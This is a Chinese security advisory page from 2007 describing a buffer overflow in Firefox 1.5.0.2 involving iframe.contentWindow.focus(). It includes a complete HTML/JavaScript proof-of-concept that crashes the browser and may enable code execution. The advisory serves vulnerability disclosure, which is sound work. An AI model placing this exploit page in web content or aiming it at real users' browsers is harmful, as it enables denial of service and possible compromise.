Mozilla Firefox iframe.contentWindow.focus缓冲区溢出漏洞

| 网站首页 | 模板 | 资料 | 源码 | 工具 | 开发 | 设计 | 安全 | 项目 | 网络 | 图片 | 系统 | 数据库 | 博客 | 会员中心 | 小说 |

网络学院

学习资料

源码模版

您现在的位置：精品下载 >> 安全 >> 网络安全 >> 安全中心正文

用户登录

新用户注册

Mozilla Firefox iframe.contentWindow.focus缓冲区溢出漏洞

【字体：小大】

Mozilla Firefox iframe.contentWindow.focus缓冲区溢出漏洞

作者：佚名安全中心来源：不详点击数：更新时间：2007-10-10

涉及程序：
Mozilla Firefox iframe.contentWindow.focus

描述：
Mozilla Firefox iframe.contentWindow.focus缓冲区溢出漏洞

详细：
Mozilla Firefox是一款流行的开放源码WEB浏览器。

Firefox处理有关iframe.contentWindow.focus()的js320.dll和xpcom_core.dll中某些JavaScript的方式存在缓冲区溢出漏洞。攻击者可以利用找个漏洞导致浏览器拒绝服务，也可能执行任意代码。

<*来源：chris（chris@cr-secure.net）

链接：（http://70.103.141.167//vuln/ff.txt
*>

受影响系统：
Mozilla Firefox 1.5.0.2

攻击方法：
警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
　　var textarea = document.getElementsByName("x_OtherInfo");
　　textarea=textarea.item(0);
　　　var htmlarea = document.createElement("div");
　　htmlarea.className = "htmlarea";
　　textarea.parentNode.insertBefore(htmlarea, textarea);
　　var iframe = document.createElement("iframe");
　　htmlarea.appendChild(iframe);
　　　 var doc = iframe.contentWindow.document;
　　　　　doc.designMode = "on";
　　　　　doc.open();
　　　　　doc.write("<iframe src=''>");
　　　iframe.contentWindow.focus()
doc.close();
</script>
</textarea>

解决方案：
厂商补丁：

Mozilla
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

（http://www.mozilla.org/

安全中心录入：chqnet 责任编辑：chqnet

上一个安全中心： IBM AIX mklvcopy工具本地权限提升漏洞

下一个安全中心： Fenice远程溢出及拒绝服务漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关安全中心
				Winzip存在多个缓冲区溢出漏… 系统安全基础之另类方法解除… 采用Mod_SSL技术让Apache更加… HP-UX usermod工具本地非授权… Novell eDirectory Server i… Moodle moodle.php远程文件包… Mozilla Firefox/SeaMonkey/… ZipCentral ZIP文件解压栈溢… ScozNet ScozNews多个远程文… Mozilla Suite/Firefox/SeaM…

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）